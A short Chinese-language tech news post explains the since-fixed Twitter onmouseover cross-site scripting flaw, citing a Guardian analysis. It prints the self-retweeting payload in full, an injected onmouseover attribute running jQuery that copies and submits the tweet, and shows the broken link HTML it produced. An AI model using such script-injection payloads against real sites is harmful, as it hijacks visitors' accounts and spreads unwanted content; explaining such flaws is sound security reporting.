數小時前,有人發現在Twitter上打上onmouseover字句,就可以讓其他人用滑鼠移動至自己的Tweet時,就會自動彈出訊息或開啟網站。最初本來很有趣,但後來有黑客更改有關漏洞,令一班用戶受害。其他人瀏覽受害的用戶的Tweet時,會自動彈出色情網站,一些情況下更會自動轉發訊息。
漏洞究竟是如何做到?Guardian就有相關分析:
1. 在Twitter.com發佈連結時,理論上會由
http://www.winandmac.com變成<a href=”
http://www.winandmac.com” class=”tweet-url web” rel=”nofollow”>http://www.winandmac.com</a>
2. 有人發佈以下內容,則可以令Twitter.com解析錯誤:
http://a.no/@”;onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit();”class=”modal-overlay”/
3. Twitter.com網站最初無法抽出當中的a.no連結,最終變成以下內容,令瀏覽器在其他人瀏覽時,只要移動滑鼠(onmouseover)至連結上,即能自動開啟網頁,甚至乎執行轉發的動作:
<a href=”
http://a.no/@”;onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit();”class=”modal-overlay”/ rel=”nofollow”>
今次事件中,僅限於直接使用Twitter.com的用戶,若本身有用第三方Twitter軟件則不受影響。無論如何,現在有關問題已經修復,大家也就不用擔心了。
Share this: 
